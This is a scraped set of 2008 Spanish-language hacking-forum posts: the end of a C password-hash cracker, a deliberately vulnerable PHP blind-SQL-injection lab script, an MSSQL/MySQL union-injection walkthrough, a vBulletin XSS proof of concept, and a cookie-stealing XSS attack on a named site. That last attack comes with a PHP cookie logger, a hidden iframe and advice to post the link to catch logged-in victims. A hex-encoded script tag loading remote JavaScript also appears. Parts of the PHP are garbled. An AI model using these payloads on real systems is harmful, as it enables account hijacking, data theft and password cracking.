          pass_ary[i+3] = e;
          return 1;
        }

        while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
          sum -= MAX_CHAR;
          i--;
        }
        if (i < 0) break;
        pass_ary[i]++;
        xor_ary[i] += step_ary[i];
        sum++;
        state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
        state2_ary[i+1] = state2_ary[i]
          + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
      }

      return 0;
    }

    void crack(char *hash)
    {
      int i, len;
      u32 targ1, targ2, targ3;
      int pass[MAX_LEN];

      if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
        printf("Invalid password hash: %s\n", hash);
        return;
      }
      printf("Hash: %08lx%08lx\n", targ1, targ2);
      targ3 = targ2 - targ1;
      targ3 = targ2 - ((targ3 << 8) ^ targ1);
      targ3 = targ2 - ((targ3 << 8) ^ targ1);
      targ3 = targ2 - ((targ3 << 8) ^ targ1);

      for (len = 3; len <= MAX_LEN; len++) {
        printf("Trying length %d\n", len);
        if ( crack0(len-4, targ1, targ3, pass) ) {
          printf("Found pass: ");
          for (i = 0; i < len; i++)
            putchar(pass[i]);
          putchar(`\n`);
          break;
        }
      }
      if (len > MAX_LEN)
        printf("Pass not found\n");
    }

    int main(int argc, char *argv[])
    {
      int i;
      if (argc <= 1)
        printf("usage: %s hash\n", argv[0]);
      for (i = 1; i < argc; i++)
        crack(argv[i]);
      return 0;
    }


    ----------------------------------------------------
    script vulnerable

    Code sql!:

    CREATE TABLE `users` (
      `id` int(10) unsigned NOT NULL auto_increment,
      `name` varchar(50) NOT NULL,
      `password` varchar(50) NOT NULL,
      PRIMARY KEY  (`id`)
    ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
    ­­ users ­­
    INSERT INTO `users` VALUES (1, `administrator`, `1234%&_`);
    INSERT INTO `users` VALUES (2, `ka0x`, `t3st_bl1nd`);
    INSERT INTO `users` VALUES (3, `bush`, `terrorist`);


    script php:



    <?php 
    # ­­­­ CONFIG ­­­­­
    $host = `localhost`;
    $dbuser = `root`;
    $dbpass = `password`;
    $dbname = `blind`;
    # ­­­­­­­­­­­­­­­­­
    echo "<title>Blind SQL Injection Test ­ D.O.M LABS 2008</title>";
    $db mysql_connect($host$dbuser$dbpass);
    mysql_select_db($dbname,$db);
    $sql "SELECT * FROM users WHERE id=".$_GET[`id`];
                
    $query mysql_query($sql);
                if(@
    mysql_num_rows($query)==0){
                        die(`
    No hay columnas`);
                }
                
    $result=@mysql_fetch_row($query);
                echo 
    "<h2><center><u>Blind SQL Injection Test<br>D.O.M LABS</u><br><
    br>"
    ;
                echo 
    "<font color=`#FF0000`>user_id: </font>".$result[0]."<br>";
                echo 
    "<font color=`#FF0000`>username: </font>".$result[1]."<br>";
                
    // echo "Password: ".$result[2]."<br>";
                
    echo "</h2></center>";
                die();
    ?>




    Explorador de base de datos (General Injection Explorer 3.0) atravez de sqli by  PonyMagic

    uso: PonyMagic


    (0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)


    Uso:


#19
Nivel Web / duda sql inyeccion mssql
6 Noviembre 2008, 00:10 AM
Bueno mi duda es la siguiente .. estuve realizando una inyeccion y pude sacar datos basicos ( como version,usuario,base de datos),ademàs de eso tambien saque todos los nombres de las bases de datos y de luego pude sacar todas las tablas de una sola base de datos en la cual tenia permisos el usuario.

hice lo siguiente:

asi para sacar las bases de datos:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 3 name FROM master..sysdatabases ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--
y cambiando el TOP mostraba las demàs

y asi las tablas:

?id=45 or 1 in (SELECT TOP 1 name FROM (SELECT TOP 1 name FROM (SELECT TOP 123 name FROM portal..SYSOBJECTS ORDER BY name ASC) as foo ORDER by name DESC) as foo ORDER by name DESC)--

la pregunta es .. como puedo sacar las columnas de una tabla?

me refiero a no tener que sacar todas las columnas de todas las tablas si no de una en especial .. algo parecido a esto como en mysql:

from+information_schema.columns+WHERE+table_name = 'usuarios'--

como vemos en MySQL busca las columnas pero solo de esa tabla en especial.
#20
Bueno he hecho lo siguiente ..

supongamos que tenemos esto.

http://www.site.com/id.php?numero=

bueno enpese haciendo esto ..

http://www.site.com/id.php?numero=-1 order by 1

pero apenas lo hice problemas y tiro el siguiente error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cuando.IDCUANDO DESC LIMIT 0, 10' at line 1

pero eso se arreglo de la siguiente forma ..

http://www.site.com/id.php?numero=-1 order by 1/*

asi que comente la linea y procedi.


http://www.site.com/id.php?numero=-1 order by 1/*
http://www.site.com/id.php?numero=-1 order by 2/*
http://www.site.com/id.php?numero=-1 order by 3/*
http://www.site.com/id.php?numero=-1 order by 4/*
http://www.site.com/id.php?numero=-1 order by 5/*
hasta que:
http://www.site.com/id.php?numero=-1 order by 6/*
Unknown column '6' in 'order clause'

luego:

http://www.site.com/id.php?numero=-1 union all select 1,2,3,4,5/*

tiro un 2 asi que hice esto.

http://www.site.com/id.php?numero=-1 union all select 1,table_name,3,4,5 from information_schema.tables where table_schema = database()/*

pero obtuve:

SELECT command denied to user 'alguien'@'localhost' for table 'tables'

entonces como no podia y tenia suficientes datos me puse a averiguar las tablas:

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from users/*

pero me tiro:

Table 'db.users' doesn't exist

asi que probe con otro y puse "usuarios"

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from usuarios/*

y vaya le pegue! tiro:

Unknown column 'username' in 'field list'

asi que puse otros nombres para reemplazar a "username" hasta que al poner "usuario":

http://www.site.com/id.php?numero=-1 union all select 1,concat(usuario),3,4,5 from usuarios/*

sii! le habia pegado.

pero ...

me tiro la pagina pero no los datos que contenia .. :S.

no habia nada màs que unos : y probe:

http://www.site.com/id.php?numero=-1 union all select 1,concat(pass),3,4,5 from usuarios/*

y tambien le pegue! pero  estaban los 2 puntos .. se que no eran nada pero por las dudas los use para iniciar sesiòn y no tuve resultados.

tambien mire el codigo fuente quizas estaba abajo del flash pero no encontre nada.

por que la pagina no me tira los datos contenidos?



si alguien me puede ayudar estoy aprendiendo  :rolleyes:

#21
Nivel Web / [°] [UP] vBulletin 3.7.0 xss
14 Mayo 2008, 00:08 AM
"se requiere ajaxReg para explotar la vulnerabilidad"


El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=XSS

http://www.site.com/foro/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

http://www.foro-cualquiera.com/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>


:)

publicado en: http://mentespiritual.com/xss.txt
#22
Nivel Web / [XSS] foroswebgratis
28 Enero 2008, 03:52 AM
en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web  "home-buscador-run.php"

link:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />


y aqui la tabla para encodearla:
son los de la columna code..


http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

<?php
 $cookie 
$_GET['c'];
 
$ip getenv ('REMOTE_ADDR');
 
$date=date("m/d/Y g:i:s a");
 
$referer=getenv ('HTTP_REFERER');
 
$fl fopen('log.txt''a');
 
fwrite($fl"\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 
fclose($fl);
?>



index.htm

<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!